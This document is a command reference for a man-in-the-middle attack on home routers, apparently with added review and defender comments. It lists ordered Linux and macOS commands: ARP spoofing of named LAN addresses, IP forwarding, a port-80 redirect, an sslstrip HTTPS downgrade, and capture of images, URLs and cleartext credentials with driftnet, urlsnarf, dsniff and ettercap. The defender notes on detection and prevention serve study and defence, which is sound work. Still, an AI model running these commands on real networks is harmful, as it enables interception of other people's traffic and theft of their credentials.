Man-in-the-middle attack and data acquisition on home routers.
# Linux section. These lines are a command reference from the original notes,
# not a runnable script: each tool is started separately.
#
# Enable IPv4 packet forwarding in the kernel (this is routing between hosts,
# not "port forwarding"). The write to /proc is a runtime setting only.
# Defender note: ip_forward=1 on an ordinary workstation is unusual and worth
# alerting on.
echo 1 >/proc/sys/net/ipv4/ip_forward
# Extract images from traffic visible on eth0. Only unencrypted HTTP content
# can be reconstructed; images served over TLS are not exposed.
# -d sets the output directory; -a presumably runs without the display window
# and only saves files -- confirm against the driftnet manual.
driftnet -i eth0 -d ~/Desktop/pic -a
driftnet -i eth0
# Log the URLs of cleartext HTTP requests seen on eth0.
urlsnarf -i eth0
# Redirect TCP port 80 traffic arriving at this host to a local listener.
# <yourListenPort> is a placeholder from the original notes, not literal syntax.
# Defender note: an unexpected REDIRECT rule shows up in
# `iptables -t nat -S PREROUTING` and persists until it is deleted.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
# Send forged ARP replies to 192.168.2.165 that claim the address 192.168.2.1.
# Defender note: this is visible as the gateway IP changing MAC address, or as
# two IPs sharing one MAC in `ip neigh` / `arp -a`. Dynamic ARP Inspection on
# the switch or static ARP entries for the gateway prevent it.
arpspoof -i eth0 -t 192.168.2.165 192.168.2.1
# Send forged ARP replies to the gateway (192.168.2.1) that claim the address
# 192.168.2.150.
arpspoof -i eth0 -t 192.168.2.1 192.168.2.150
# Same spoof against 192.168.2.213. Per the arpspoof manual, -c selects which
# hardware address is used when the ARP entries are restored on exit ("own"
# here) -- it is not a traffic filter, despite the original "Filter spoofing".
arpspoof -i eth0 -c own -t 192.168.2.213 192.168.2.1
# Variant from the original notes with an explicit listening port:
## sslstrip -l <yourListenPort>
# Rewrite HTTPS links to HTTP in the redirected traffic so that content stays
# in cleartext. Defender note: HSTS (ideally preloaded) makes browsers refuse
# the downgrade, and HTTPS-only mode on clients has the same effect.
sslstrip
## Start packet capture tool
# NOTE(review): "wirewhark" looks like a typo for "wireshark" -- left as in the
# original.
wirewhark
# macOS / pf section. The next line is pf rule syntax, not a shell command;
# presumably it is the content of the anchor file loaded below
# (/etc/pf.anchors/http) -- confirm. It redirects TCP port 80 traffic arriving
# on en0 to 127.0.0.1:8080.
rdr pass on en0 proto tcp from any to any port 80 -> 127.0.0.1 port 8080
# Listener on the port the rdr rule above points to (8080).
sslstrip -l 8080
# Modify /etc/pf.conf: add the following two lines at the appropriate location.
# They declare the "http-forwarding" anchor and load its rules from
# /etc/pf.anchors/http.
rdr-anchor "http-forwarding"
load anchor "http-forwarding" from "/etc/pf.anchors/http"
# Reload the packet filter: -e enables pf and -f loads the given rule file;
# -E also enables pf.
# Defender note: `pfctl -s nat` lists loaded rdr rules, so an unexpected
# redirect of port 80 to localhost is easy to audit for.
sudo pfctl -ef /etc/pf.conf
sudo pfctl -E
# Enable IPv4 forwarding (runtime sysctl).
sudo sysctl -w net.inet.ip.forwarding=1
# Check forwarding status
sudo sysctl -a | grep forward
# Syntax: arpspoof -i en0 -t (target IP) (gateway IP)
# Forged ARP replies sent to the address after -t, claiming the last address.
# Defender note: same indicators as any ARP spoof -- the gateway's MAC changes
# in client ARP caches; Dynamic ARP Inspection or static gateway entries block it.
arpspoof -i en0 -t 10.196.17.58 10.196.17.1
arpspoof -i en0 -t 10.196.17.1 10.196.17.24
# Capture traffic with ettercap's graphical interface (-G).
sudo ettercap -G
# The next two notes look like steps performed inside the ettercap GUI -- confirm.
# Select target1
# Gateway spoofing
# dsniff reports credentials seen in cleartext protocols on eth0; protocols
# wrapped in TLS or SSH do not expose them.
dsniff -i eth0
# Wireshark display filter (typed into Wireshark's filter bar, not a shell
# command): HTTP packets whose source address is 192.168.2.213.
ip.src==192.168.2.213 and http
Please indicate the source when reprinting. This article is licensed under the CC4.0 license.